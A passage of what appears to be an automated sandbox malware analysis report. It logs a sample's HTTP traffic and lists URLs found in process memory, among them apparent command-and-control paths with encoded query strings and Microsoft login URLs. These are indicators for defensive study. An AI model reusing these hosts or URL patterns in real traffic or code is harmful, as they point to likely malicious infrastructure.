            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 
20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:26 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:32 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QrZZmLd3CxMzuhOdmEFVo%2F124P9tHUZ80XAD6guzufB%2BONFGryXrEFtlSU9H0wEOj68pt4VuwrXS2AwU89AGSBWjYM2O7blQDbooMnwCBmO8NPetPQI%2FyUHQM3mMI6Kvg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc5246ffbd7cb1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXOkGO188K0%2FdGhR72%2BE06zm0h4ugb%2FDxeDDFKOcLIQmJXLUPxjwAbNl%2FOZQV5q6paIr9ELY8Y5fIWDKrVq6%2BXXLwUESNUBbNpTqs2h8YQajLj8qG7TvPsBoY6nq3OcUZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc525708be424c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jkYK070JsTo1ofk9%2BPbAilfG%2F4MbAiGjpG%2B0uCu7IfHNv2mwyh4NSEHAYN%2Bj%2FoItBtq801TM%2B0OaQDgzRpcOt%2BYzhBkI4anoH%2BjbMDLN3NDqIP1A62Ddxh5SNkKnK%2F30Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc5266f8027cf3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Frgizj9WQtT5Pc2HYVb5PiOilrxpS5VhIzAndHwBKA7mMQLMcC%2B%2BKU%2BgxNHgaWwFbHSqiVPJiAq3WGhwXn1BPBEwVRXSLs1O3ywRAx%2FeVhZEP45pi2DFpFWiHXV5DNCPnw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc5276fa564246-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 
72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 04 Sep 2024 07:38:55 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, close | Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT | Accept-Ranges: bytes | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 836 | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 04 Sep 2024 07:38:57 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, close | Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT | Accept-Ranges: bytes | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 836 | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 04 Sep 2024 07:39:00 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, close | Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT | Accept-Ranges: bytes | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 836 | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 04 Sep 2024 07:39:04 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, close | Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT | Accept-Ranges: bytes | Content-Length: 2361 | Vary: Accept-Encoding | Content-Type: text/html
            Source: rasdial.exe, 00000006.00000002.4131381557.00000000068B8000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003B28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005904000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002B74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000317D4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://nginx.net/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.redhat.com/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4132511834.0000000004C2A000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tadalaturbo.online
            Source: sXIYDUFnJY.exe, 00000007.00000002.4132511834.0000000004C2A000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tadalaturbo.online/7o3y/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.00000000034E0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xforum.tech/647x/?56gD=FnaXBox54
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000003.2206318990.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/blog/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/comments/feed/
